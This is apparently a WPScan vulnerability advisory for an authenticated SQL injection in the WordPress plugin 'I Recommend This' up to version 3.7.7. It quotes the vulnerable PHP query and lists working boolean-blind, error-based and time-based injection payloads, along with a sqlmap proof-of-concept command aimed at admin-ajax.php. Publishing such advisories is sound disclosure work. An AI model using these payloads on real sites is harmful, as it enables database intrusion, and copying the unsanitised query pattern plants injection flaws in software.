I Recommend This <= v3.7.7 - Authenticated SQL Injection

Sign up to our free email alerts service for instant vulnerability notifications!

Description
Plugin description: "This plugin allows your visitors to simply like/recommend your posts instead of comment on it."
Active installs (according to https://wordpress.org/plugins/i-recommend-this/): 40.000+

It's possible to inject SQL into the [dot_recommends] shortcode, if the check for IP addresses is activated (default value). A low-privileged account is necessary for this - subscriber is enough. Very critical if debug mode of WordPress is active (see Vulnerabilites).

dot-irecommendthis.php:65

add_shortcode( 'dot_recommends', array( &$this, 'shortcode' ) );


dot-irecommendthis.php:559-564

function shortcode( $atts )
{
	extract( shortcode_atts( array('id' => null), $atts ) );
	return $this->dot_recommend($id);

}	//shortcode


dot-irecommendthis.php:587-590 (function dot_recommend($id))

if( $options['disable_unique_ip'] != '1' ) {

	$voteStatusByIp = $wpdb->get_var("SELECT COUNT(*) FROM ".$wpdb->prefix."irecommendthis_votes WHERE post_id = '$post_ID' AND ip = '$ip'");
}

This (https://blog.sucuri.net/2016/08/sql-injection-vulnerability-ninja-forms.html) great article will help understanding how to exploit shortcodes and why this works.

Vulnerabilities:

If WP_DEBUG is set to true:

    Type: boolean-based blind
    Title: MySQL RLIKE boolean-based blind - WHERE, HAVING, ORDER BY or GROUP BY
 clause
    Payload: shortcode=[dot_recommends id="2' RLIKE (SELECT (CASE WHEN
 (5258=5258) THEN 0x73686f7274636f64653d5b646f745f7265636f6d6d656e64732069643d22
325f5f424f554e4445445f494e4a454354494f4e5f4d41524b5f5f225d26616374696f6e3d706172
73652d6d656469612d73686f7274636f6465 ELSE 0x28 END))-- ZKlm"]&action=parse-media
-shortcode

    Type: error-based
    Title: MySQL >= 5.1 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY cl
ause (EXTRACTVALUE)
    Payload: shortcode=[dot_recommends id="2' AND EXTRACTVALUE(2988,CO
NCAT(0x5c,0x716a766a71,(SELECT (ELT(2988=2988,1))),0x7162707a71))-- LCIV"]&actio
n=parse-media-shortcode

    Type: AND/OR time-based blind
    Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP)
    Payload: shortcode=[dot_recommends id="2' AND (SELECT * FROM (SELE
CT(SLEEP(5)))BQPZ)-- NVfD"]&action=parse-media-shortcode

If WP_DEBUG is set to false (should be the most common scenario):

    Type: AND/OR time-based blind
    Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP)
    Payload: shortcode=[dot_recommends id="2' AND (SELECT * FROM (SELE
CT(SLEEP(5)))NxWj)-- JHJu"]&action=parse-media-shortcode
    Vector: AND (SELECT * FROM (SELECT(SLEEP([SLEEPTIME]-(IF([INFERENCE],0,[SLEE
PTIME])))))[RANDSTR])
Proof of Concept
python sqlmap.py -u "http://wordpress.app/wp-admin/admin-ajax.php" --cookie "[insert cookie of a wordpress account, even if it's just a subscriber]" --data="shortcode=[dot_recommends id=\"2*\"]&action=parse-media-shortcode" -p action --level 5 --dbms=mysql

Affects Plugin

References

URL https://wordpress.org/plugins/i-recommend-this/

Classification

Type SQLI
OWASP Top 10 A1: Injection
CWE CWE-89

Miscellaneous

Submitter Paul Dannewitz
Submitter Twitter padannewitz
Views 0
Verified No
WPVDB ID 8887

Timeline

Publicly Published 2017-08-14 (about 1 month ago)
Added 2017-08-16 (about 1 month ago)
Last Updated 2017-08-16 (about 1 month ago)

Copyright & License

Copyright All data and resources contained within this page and this web site is Copyright © The WPScan Team.
License Some of this data may be used for non-commercial purposes, however, any potential commercial usage of this data will require a license. If you would like to inquire about a commercial license please contact us.